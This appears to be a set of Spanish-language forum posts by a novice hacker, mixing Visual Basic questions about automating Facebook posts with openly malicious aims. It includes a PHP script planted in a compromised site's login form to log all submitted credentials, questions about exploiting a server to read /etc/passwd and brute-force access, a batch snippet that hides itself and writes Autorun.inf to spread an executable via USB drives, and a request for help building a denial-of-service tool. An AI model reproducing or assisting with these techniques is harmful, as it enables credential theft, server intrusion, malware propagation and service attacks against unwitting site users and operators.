Mensajes

[index.php]

Hola a todos bueno les cuento tengo una duda lo que pasa es que logre tomar el control de un index.php y quiero editar el <form method="post" ACTION=datos.php

el codigo de datos.php pienso ponerle esto:

Código [Seleccionar] Expandir

<?php
header ('Location: http://www.web.com/ ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

pero si ago lo anterior ningun usuario podria autentificarse ya que solamente guardaria los datos y despues lo redireccionaria a otra web 
me gustaria que redireccionara autentificado,existe alguna manera para que se guarden los datos del form o que se intercepten y que despues se logue?
si me pudieran explicar un poquito se los agradeceria demasiado

desde ya gracias

Hola a todos bueno e estado investigando acerca de esta vulnerabilidad,e podido explotarla en una web y me entrega todos los usarios e informacion que tienen,pero tengo unas dudas

por lo que leido

1-¿uno puede explorar el pc del servidor? o solamente me entrega los usuarios del el server



2-si es así como me muevo? es por el navegador?


3-por lo que se las claves de las cuentas no quedan guardadas en /etc/passwd sino quedan guardadas en un /etc/passwd/shadow se supone que solo el root puede tener acceso a dicha carpeta


cuando use el exploit no me aparecio ese directorio esto es por causa de que no lo tiene,por que solamente queda guardada en /etc/passwd o me equivoco??

4-si solamente me entregara los usarios del pc,¿como puede tener acceso al servidor osea entrar para loguearme (que puerto por donde)?

5-¿existe algun bruteforce para poder entrar al servidor?

6-¿que diferencia una cuenta login de una nologin?


Porfavor espero una respuesta a mis dudas xD Muchas Gracias,por tomarse el tiempo en leer este post lleno de duas

Gracias por su rapida respues

esta vez ise una sola parte del comando

Private Sub Command1_Click()
WebBrowser1.Navigate "http://apps.new.facebook.com/guerra-de-pandillas/discussion.php"
End Sub

hay me marca el error

dice error se requiere un objeto

¿Cual deve ser la causa?

la pagina existe pero verla debo estar logueado

Código [Seleccionar] Expandir

Supongo que pusiste el WebBrowser1 y el Text1.Text...

me estoy iniciando recien en esto aque te refieres con WebBrowser1? el 1 varia el comando??

a y lo del text1.text (pregunta aparte si al momento de crear una cajita para insertar texto aparece en sus propiedades que se llama text1 al momento de programar para que recoja los datos debo poner text1.text o el nombre igual al de la cajita??)

le asigne esa variable por que deberia recojer el texto que puse en la aplicacion  insertarlo en el textbox de la web

Hola a todos bueno les cuento me estoy iniciando en visual basic recien aprendi lo q era una variable xd un msgbox y peuqeñas cosas mas bueno les cuento estoy tratando de hacer una aplicacion que haga lo siguiente
1-escribir un texto en una pagina web y luego presionar el boton de enviar de la web

busque por internet comandos y lo ise de esta forma

Private Sub Command1_Click()
WebBrowser1.Navigate "http://apps.new.facebook.com/guerra-de-pandillas/discussion.php"
WebBrowser1.Document.All.Item("wall_text").Value = Text1.Text
WebBrowser1.Document.All.Item("inputsubmit").Click
End Sub


El problema es que me marca un error 424 dice que falta un objeto

Porfavor necesito su ayuda,les pide que si tengo que agregar un comando mas o otra cosa que me explique que hace tal comando ya que mi idea es aprender no copiar y pegar sources ^^

Gracias

Bueno si tienes muchos problemas podrias enves de hacerlo en visualbasic podrias hacerlo en bat y luego juntarlo con tu aplicacion resultante

Código [Seleccionar] Expandir

@XCOPY %0 %x%
@ATTRIB %0 +H +S
echo [AUTORUN] > %x%Autorun.inf
echo OPEN=Driver.exe >> %x%Autorun.inf
echo shell\open\command=[color=red]aplicacion.exe[/color]>> %x%Autorun.inf
echo shell\open=' >> %x%Autorun.inf
cd %x%

Donde %x% es la variable del nombre del dispositivo
donde aplicacion.exe es el nombre final de tu aplicacion espero que te sirva saludos

Hola a todos bueno tengo una gran duda mas que nada no es para mi sino un amigo que sabe programar y todo Bueno les cuento mi amigo a creado una aplicacion pero le gustaria que se pudiera ejecutar por cmd/shell como los exploit en perl algo asi y que desde hay mismo se pudiera configurar
ej:"aplicacion.exe 900 -t

hay algun manual para eso?
Gracias

PD:el programa es para hacer ataques de denegacion de servicios

Muchas Gracias Adios

Hola a todos Bueno quiero Hacer lo siguiente en mi batch pero no se como xD

Aqui va


Quiero crear automaticamente un documento.inf y que este dentro ya tenga escrito algo

Es posible en batch Gracias